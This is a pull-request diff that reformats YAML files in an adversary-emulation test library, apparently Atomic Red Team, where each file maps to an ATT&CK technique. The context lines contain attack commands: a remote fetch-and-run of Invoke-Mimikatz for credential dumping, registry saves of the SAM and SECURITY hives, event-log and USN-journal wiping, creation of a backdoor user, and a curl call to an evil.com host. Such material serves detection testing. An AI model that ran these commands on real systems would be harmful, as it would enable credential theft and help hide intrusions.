Merge pull request #231 from m0jtaba/master

Changing keywords to match the rest of the atomic test files and basic formatting

atomics/T1002/T1002.yaml

@@ -27,7 +27,7 @@ atomic_tests:
     TODO
   supported_platforms:
     - windows
-  input_argument:
+  input_arguments:
     input_file:
       description: Path that should be compressed into our output file
       type: Path
@@ -44,11 +44,9 @@ atomic_tests:
 - name: Data Compressed - nix
   description: |
     TODO
-
   supported_platforms:
     - linux
     - macos
-
   executor:
     name: sh
     command: |

atomics/T1003/T1003.yaml

@@ -13,7 +13,7 @@ atomic_tests:
       description: URL to a remote Mimikatz script that dumps credentials
       type: Url
       default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
-  executor: 
+  executor:
     name: powershell
     command: |
       IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
@@ -23,7 +23,7 @@ atomic_tests:
     https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
   supported_platforms:
     - windows
-  executor: 
+  executor:
     name: command_prompt
     command: |
       gsecdump -a
@@ -33,26 +33,25 @@ atomic_tests:
     http://www.ampliasecurity.com/research/windows-credentials-editor/
   supported_platforms:
     - windows
-  input_argument:
+  input_arguments:
     output_file:
       description: Path where resulting data should be placed
       type: Path
       default: output.txt
-  executor: 
+  executor:
     name: command_prompt
     command: |
       wce -o #{output_file}
 
 - name: Registry dump of SAM, creds, and secrets
   description: |
-    Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated 
+    Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
     via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
   supported_platforms:
     - windows
-  executor: 
+  executor:
     name: command_prompt
     command: |
-      reg save HKLM\sam sam 
+      reg save HKLM\sam sam
       reg save HKLM\system system
       reg save HKLM\security security
-

atomics/T1007/T1007.yaml

@@ -11,7 +11,7 @@ atomic_tests:
     - windows
 
   input_arguments:
-    servicename:
+    service_name:
       description: Name of service to start stop, query
       type: string
       default: svchost.exe

atomics/T1028/T1028.yaml

@@ -27,7 +27,7 @@ atomic_tests:
     - windows
 
   input_arguments:
-    computername:
+    computer_name:
       description: Name of Computer
       type: string
       default: computer1

atomics/T1033/T1033.yaml

@@ -10,7 +10,7 @@ atomic_tests:
     - windows
 
   input_arguments:
-    computername:
+    computer_name:
       description: Name of remote computer
       type: strong
       default: computer1

atomics/T1048/T1048.yaml

@@ -24,7 +24,7 @@ atomic_tests:
       description: username for domain
       type: string
       default: atomic
-    passowrd:
+    password:
       description: password for user
       type: string
       default: atomic

atomics/T1050/T1050.yaml

@@ -20,8 +20,6 @@ atomic_tests:
 
   supported_platforms:
     - windows
-  input_arguments:
-
   executor:
     name: powershell
     command: |

atomics/T1053/T1053.yaml

@@ -54,11 +54,11 @@ atomic_tests:
       description: Target
       type: String
       default: localhost
-    UserName:
+    user_name:
       description: Username DOMAIN\User
       type: String
       default: DOMAIN\user
-    Password:
+    password:
       description: Password
       type: String
       default: At0micStrong

atomics/T1070/T1070.yaml

@@ -6,7 +6,6 @@ atomic_tests:
 - name: Clear  Logs
   description: |
     Clear Windows Event Logs
-
   supported_platforms:
     - windows
   input_arguments:
@@ -14,33 +13,25 @@ atomic_tests:
       description: Windows Log Name, ex System
       type: String
       default: System
-
   executor:
     name: command_prompt
     command: |
       evtutil cl #{log_name}
-
 - name: FSUtil
   description: |
     Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume.
-
   supported_platforms:
     - windows
-  input_arguments:
-
   executor:
     name: command_prompt
     command: |
       fsutil usn deletejournal /D C:
-
 - name: rm -rf
   description: |
     Delete system and audit logs
-
   supported_platforms:
     - macos
     - linux
-
   executor:
     name: sh
     command: |

atomics/T1085/T1085.yaml

@@ -1,3 +1,4 @@
+---
 attack_technique: T1085
 display_name: Rundll32
 atomic_tests:

atomics/T1087/T1087.yaml

@@ -68,7 +68,7 @@ atomic_tests:
   supported_platforms:
     - linux
     - macos
-  args:
+  input_arguments:
     output_file:
       description: Path where captured results will be placed
       type: Path

atomics/T1098/T1098.yaml

@@ -6,12 +6,8 @@ atomic_tests:
 - name: Admin Account Manipulate
   description: |
     Manipulate Admin Account Name
-
   supported_platforms:
     - windows
-
-  input_arguments:
-
   executor:
     name: powershell
     command: |

atomics/T1105/T1105.yaml

@@ -1,7 +1,7 @@
 ---
-attack_technique: t1105
+attack_technique: T1105
 display_name: Remote File Copy
-  
+
 atomic_tests:
 - name: xxxx
   description: |
@@ -9,7 +9,7 @@ atomic_tests:
   supported_platforms:
     - linux
     - macos
-  executor: 
+  executor:
     name: bash
     command: |
       ### TODO: Not sure how to handle commands that need to be run on multiple systems

atomics/T1117/T1117.yaml

@@ -1,3 +1,4 @@
+---
 attack_technique: T1117
 display_name: Regsvr32
 atomic_tests:

atomics/T1118/T1118.yaml

@@ -1,3 +1,4 @@
+---
 attack_technique: T1118
 display_name: InstallUtil
 

atomics/T1121/T1121.yaml

@@ -1,3 +1,4 @@
+---
 attack_technique: T1121
 display_name: RegSvcs/RegAsm
 

atomics/T1124/T1124.yaml

@@ -11,7 +11,7 @@ atomic_tests:
     - windows
 
   input_arguments:
-    computername:
+    computer_name:
       description: computer name to query
       type: string
       default: computer1

atomics/T1127/T1127.yaml

@@ -1,3 +1,4 @@
+---
 attack_technique: T1127
 display_name: Trusted Developer Utilities
 atomic_tests:

atomics/T1130/T1130.yaml

@@ -1,14 +1,14 @@
 ---
-attack_technique: t1130
+attack_technique: T1130
 display_name: Install Root Certificate
-  
+
 atomic_tests:
 - name: Install root CA on CentOS/RHEL
   description: |
     Creates a root CA with openssl
   supported_platforms:
     - linux
-  args:
+  input_arguments:
     key_filename:
       description: Key we create that is used to create the CA certificate
       type: Path
@@ -17,7 +17,7 @@ atomic_tests:
       description: Path of the CA certificate we create
       type: Path
       default: rootCA.crt
-  executor: 
+  executor:
     name: sh
     command: |
       openssl genrsa -out #{key_filename} 4096
@@ -37,4 +37,4 @@ atomic_tests:
 # To test the new trust, apply the root certificate or another signed with it to
 # a SSL/TLS web service and attempt a connection with curl or wget.
 #
-# curl https://art.evil.com
+# curl https://art.evil.com

atomics/T1136/T1136.yaml

@@ -1,7 +1,7 @@
 ---
-attack_technique: t1136
+attack_technique: T1136
 display_name: Create Account
-  
+
 atomic_tests:
 - name: Create a user account on a Linux system
   description: |
@@ -9,15 +9,15 @@ atomic_tests:
   supported_platforms:
     - linux
   input_arguments:
-    username: 
+    username:
       description: Username of the user to create
       type: String
       default: evil_user
-    comment: 
+    comment:
       description: Comment to record when creating the user
       type: String
       default: Evil Account
-  executor: 
+  executor:
     name: bash
     command: |
       useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
@@ -27,16 +27,16 @@ atomic_tests:
     Creates a user on a MacOS system with dscl
   supported_platforms:
     - macos
-  args:
-    username: 
+  input_arguments:
+    username:
       description: Username of the user to create
       type: String
       default: evil_user
-    realname: 
+    realname:
       description: "'realname' to record when creating the user"
       type: String
       default: Evil Account
-  executor: 
+  executor:
     name: bash
     command: |
       dscl . -create /Users/#{username}

atomics/T1139/T1139.yaml

@@ -1,7 +1,7 @@
 ---
-attack_technique: t1139
+attack_technique: T1139
 display_name: Bash History
-  
+
 atomic_tests:
 - name: xxxx
   description: |
@@ -10,7 +10,7 @@ atomic_tests:
     - linux
     - macos
   input_arguments:
-    bash_history_filename: 
+    bash_history_filename:
       description: Path of the bash history file to capture
       type: Path
       default: ~/.bash_history

atomics/T1148/T1148.yaml

@@ -1,5 +1,5 @@
 ---
-attack_technique: t1146
+attack_technique: T1146
 display_name: HISTCONTROL
 
 atomic_tests:

atomics/T1170/T1170.yaml

@@ -1,3 +1,4 @@
+---
 attack_technique: T1170
 display_name: Mshta
 

atomics/T1173/T1173.yaml

@@ -12,7 +12,6 @@ atomic_tests:
 
   executor:
     name: manual
-    command: |
     steps: |
       Open Microsoft Word
 

atomics/T1179/T1179.yaml

@@ -1,3 +1,4 @@
+---
 attack_technique: T1179
 display_name: Hooking
 

atomics/T1197/T1197.yaml

@@ -10,7 +10,6 @@ atomic_tests:
 
   supported_platforms:
     - windows
-  input_arguments:
   executor:
     name: command_prompt
     command: |
@@ -21,7 +20,6 @@ atomic_tests:
     and execute a payload leveraging PowerShell
   supported_platforms:
     - windows
-  input_arguments:
   executor:
     name: powershell
     command: |